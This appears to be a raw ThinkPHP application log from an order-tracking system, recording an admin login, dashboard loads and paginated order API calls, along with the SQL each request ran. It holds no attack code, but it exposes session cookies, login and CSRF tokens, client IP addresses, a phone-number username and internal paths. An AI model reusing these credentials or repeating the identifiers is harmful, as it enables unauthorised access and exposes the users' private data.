/alidata/www/gendan/application/admin/controller/Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.007955s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000418s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_admin` [ RunTime:0.001553s ] [ sql ] [ SQL ] SELECT * FROM `ot_admin` WHERE `username` = '15233178605' LIMIT 1 [ RunTime:0.000418s ] [ sql ] [ SQL ] UPDATE `ot_admin` SET `logintime`=1658308302,`token`='770c3501-66a7-4337-9280-c95067ba570d',`updatetime`=1658308302 WHERE `id` = 74 [ RunTime:0.007700s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_admin_log` [ RunTime:0.001703s ] [ sql ] [ SQL ] INSERT INTO `ot_admin_log` (`title` , `content` , `url` , `admin_id` , `username` , `useragent` , `ip` , `createtime`) VALUES ('登录' , '{\"url\":\"\\/\",\"__token__\":\"22bf016a4c571f778a05fbd97be62463\",\"username\":\"15233178605\"}' , '/admin/index/login?url=%2F' , 74 , '15233178605' , 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36' , '106.112.205.110' , 1658308302) [ RunTime:0.005200s ] --------------------------------------------------------------- [ 2022-07-20T17:11:42+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.021692s][吞吐率:46.10req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000046s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001167s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:11:42+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.028741s][吞吐率:34.79req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000062s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001612s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:11:43+08:00 ] 106.112.205.110 GET / [ info ] 47.105.33.115:8081/ [运行时间:0.886053s][吞吐率:1.13req/s] [内存消耗:5,534.17kb] [文件加载:91] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000057s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001070s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'upgrade-insecure-requests' => '1', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'referer' => 'http://47.105.33.115:8081/admin/index/login?url=%2F', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=beqitvd4ngvh7bvt2eeg55qvf0', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001506s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/index.php [ info ] [ RUN ] app\admin\controller\Index->index[ /alidata/www/gendan/application/admin/controller/Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ VIEW ] /alidata/www/gendan/public/../application/admin/view/index/index.html [ array ( 0 => 'breadcrumb', 1 => 'site', 2 => 'config', 3 => 'auth', 4 => 'admin', 5 => 'menulist', 6 => 'navlist', 7 => 'fixedmenu', 8 => 'referermenu', 9 => 'title', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000160s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000487s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.001418s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000411s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.001021s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.001083s ] --------------------------------------------------------------- [ 2022-07-20T17:11:44+08:00 ] 106.112.205.110 GET /admin/ajax/lang?callback=define&controllername=index&v=1658308302 [ info ] 47.105.33.115:8081/admin/ajax/lang?callback=define&controllername=index&v=1658308302 [运行时间:0.032398s][吞吐率:30.87req/s] [内存消耗:3,858.52kb] [文件加载:72] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000044s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001163s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'ajax', 2 => 'lang', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => '*/*', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'referer' => 'http://47.105.33.115:8081/', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=beqitvd4ngvh7bvt2eeg55qvf0', ) [ info ] [ PARAM ] array ( 'callback' => 'define', 'controllername' => 'index', 'v' => '1658308302', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001588s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/ajax.php [ info ] [ RUN ] app\admin\controller\Ajax->lang[ /alidata/www/gendan/application/admin/controller/Ajax.php ] [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/index.php [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000114s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:11:44+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.019650s][吞吐率:50.89req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000042s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001093s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:11:44+08:00 ] 221.192.178.45 POST /api/kuguan/order/getnotruorderbuid?staff_id=99&offset=3&pageNum=10 [ info ] 47.105.33.115:8081/api/kuguan/order/getnotruorderbuid?staff_id=99&offset=3&pageNum=10 [运行时间:0.051862s][吞吐率:19.28req/s] [内存消耗:4,769.88kb] [文件加载:76] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000042s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001136s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'kuguan.order', 2 => 'getnotruorderbuid', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=kotd47fn3qlt2emign2nuin444', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'staff_id' => '99', 'offset' => '3', 'pageNum' => '10', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001574s ] [ info ] [ RUN ] app\api\controller\kuguan\Order->getnotruorderbuid[ /alidata/www/gendan/application/api/controller/kuguan/Order.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000548s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.001533s ] [ sql ] [ SQL ] SELECT * FROM `ot_staffinfo` WHERE `id` = 99 LIMIT 1 [ RunTime:0.000322s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.001432s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.001040s ] [ sql ] [ SQL ] SELECT `orderinfo`.`id`,`orderinfo`.`nei_number`,`orderinfo`.`number`,`orderinfo`.`pid`,`orderinfo`.`order_company`,`orderinfo`.`order_connect`,`orderinfo`.`order_phone`,`orderinfo`.`kehu_id`,`orderinfo`.`price`,`orderinfo`.`material_id`,`orderinfo`.`pProductinfo_id`,`orderinfo`.`productinfo_id`,`orderinfo`.`order_type`,`orderinfo`.`order_status`,`orderinfo`.`all_order_status`,`orderinfo`.`shengchan_status`,`orderinfo`.`zuixinshuoming`,`orderinfo`.`guzhangshu`,`orderinfo`.`zuixinguzhang`,`orderinfo`.`techprocess_id`,`orderinfo`.`actual_amount`,`orderinfo`.`kucun_amount`,`orderinfo`.`produce_amount`,`orderinfo`.`produced_amount`,`orderinfo`.`waste_amount`,`orderinfo`.`produced_time`,`orderinfo`.`send_amount`,`orderinfo`.`ruku_posi`,`orderinfo`.`sent_amount`,`orderinfo`.`out_time`,`orderinfo`.`build_order_staffid`,`orderinfo`.`factorymge_id`,`orderinfo`.`admin_id`,`orderinfo`.`remind_day`,`orderinfo`.`build_time`,`orderinfo`.`end_time`,`orderinfo`.`responsible_staffinfos`,`orderinfo`.`responsible_staffinfovars`,`orderinfo`.`feedback`,`orderinfo`.`guoqitime`,`orderinfo`.`guoqi_status`,`orderinfo`.`put_position`,`orderinfo`.`createtime`,`orderinfo`.`updatetime`,`orderinfo`.`is_modify`,`orderinfo`.`purchaseorder_id`,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS productinfo__product_num,productinfo.kucun AS productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime FROM `ot_orderinfo` `orderinfo` LEFT JOIN `ot_productinfo` `productinfo` ON `orderinfo`.`productinfo_id`=`productinfo`.`id` WHERE `orderinfo`.`pid` = 0 AND `orderinfo`.`factorymge_id` = 40 AND ( orderinfo.order_status in ('1','2') ) AND ( orderinfo.order_type in ('1','2','3') ) AND ( `productinfo`.`name` LIKE '%%' OR `responsible_staffinfovars` LIKE '%%' ) AND ( orderinfo.produce_amount > 0 ) ORDER BY 1658308304>orderinfo.end_time desc,1658308304>orderinfo.end_time desc,1658308304-orderinfo.end_time + orderinfo.remind_day * 24*60*60 desc, orderinfo.updatetime desc LIMIT 30,10 [ RunTime:0.002497s ] --------------------------------------------------------------- [ 2022-07-20T17:11:44+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.021520s][吞吐率:46.47req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000041s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001136s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:11:46+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.019899s][吞吐率:50.25req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000043s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001103s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:11:46+08:00 ] 221.192.178.45 GET / [ info ] 47.105.33.115:8081/ [运行时间:0.027695s][吞吐率:36.11req/s] [内存消耗:3,333.20kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000057s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001056s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001740s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000093s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:11:46+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020578s][吞吐率:48.60req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000055s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001119s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:11:46+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020679s][吞吐率:48.36req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000043s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001171s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:11:47+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.018994s][吞吐率:52.65req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000043s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001083s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:11:47+08:00 ] 221.192.178.45 GET / [ info ] 47.105.33.115:8081/ [运行时间:0.026766s][吞吐率:37.36req/s] [内存消耗:3,333.20kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000043s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001058s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001511s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000090s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:11:48+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.021482s][吞吐率:46.55req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000051s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001281s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:11:48+08:00 ] 221.192.178.45 POST /api/kuguan/order/getnotruorderbuid?staff_id=99&offset=4&pageNum=10 [ info ] 47.105.33.115:8081/api/kuguan/order/getnotruorderbuid?staff_id=99&offset=4&pageNum=10 [运行时间:0.056433s][吞吐率:17.72req/s] [内存消耗:4,757.58kb] [文件加载:76] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000043s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.002907s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'kuguan.order', 2 => 'getnotruorderbuid', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=kotd47fn3qlt2emign2nuin444', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'staff_id' => '99', 'offset' => '4', 'pageNum' => '10', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001915s ] [ info ] [ RUN ] app\api\controller\kuguan\Order->getnotruorderbuid[ /alidata/www/gendan/application/api/controller/kuguan/Order.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000471s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.001422s ] [ sql ] [ SQL ] SELECT * FROM `ot_staffinfo` WHERE `id` = 99 LIMIT 1 [ RunTime:0.000469s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.001793s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.001191s ] [ sql ] [ SQL ] SELECT `orderinfo`.`id`,`orderinfo`.`nei_number`,`orderinfo`.`number`,`orderinfo`.`pid`,`orderinfo`.`order_company`,`orderinfo`.`order_connect`,`orderinfo`.`order_phone`,`orderinfo`.`kehu_id`,`orderinfo`.`price`,`orderinfo`.`material_id`,`orderinfo`.`pProductinfo_id`,`orderinfo`.`productinfo_id`,`orderinfo`.`order_type`,`orderinfo`.`order_status`,`orderinfo`.`all_order_status`,`orderinfo`.`shengchan_status`,`orderinfo`.`zuixinshuoming`,`orderinfo`.`guzhangshu`,`orderinfo`.`zuixinguzhang`,`orderinfo`.`techprocess_id`,`orderinfo`.`actual_amount`,`orderinfo`.`kucun_amount`,`orderinfo`.`produce_amount`,`orderinfo`.`produced_amount`,`orderinfo`.`waste_amount`,`orderinfo`.`produced_time`,`orderinfo`.`send_amount`,`orderinfo`.`ruku_posi`,`orderinfo`.`sent_amount`,`orderinfo`.`out_time`,`orderinfo`.`build_order_staffid`,`orderinfo`.`factorymge_id`,`orderinfo`.`admin_id`,`orderinfo`.`remind_day`,`orderinfo`.`build_time`,`orderinfo`.`end_time`,`orderinfo`.`responsible_staffinfos`,`orderinfo`.`responsible_staffinfovars`,`orderinfo`.`feedback`,`orderinfo`.`guoqitime`,`orderinfo`.`guoqi_status`,`orderinfo`.`put_position`,`orderinfo`.`createtime`,`orderinfo`.`updatetime`,`orderinfo`.`is_modify`,`orderinfo`.`purchaseorder_id`,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS productinfo__product_num,productinfo.kucun AS productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime FROM `ot_orderinfo` `orderinfo` LEFT JOIN `ot_productinfo` `productinfo` ON `orderinfo`.`productinfo_id`=`productinfo`.`id` WHERE `orderinfo`.`pid` = 0 AND `orderinfo`.`factorymge_id` = 40 AND ( orderinfo.order_status in ('1','2') ) AND ( orderinfo.order_type in ('1','2','3') ) AND ( `productinfo`.`name` LIKE '%%' OR `responsible_staffinfovars` LIKE '%%' ) AND ( orderinfo.produce_amount > 0 ) ORDER BY 1658308308>orderinfo.end_time desc,1658308308>orderinfo.end_time desc,1658308308-orderinfo.end_time + orderinfo.remind_day * 24*60*60 desc, orderinfo.updatetime desc LIMIT 40,10 [ RunTime:0.002968s ] --------------------------------------------------------------- [ 2022-07-20T17:11:49+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020282s][吞吐率:49.30req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000064s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001206s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File 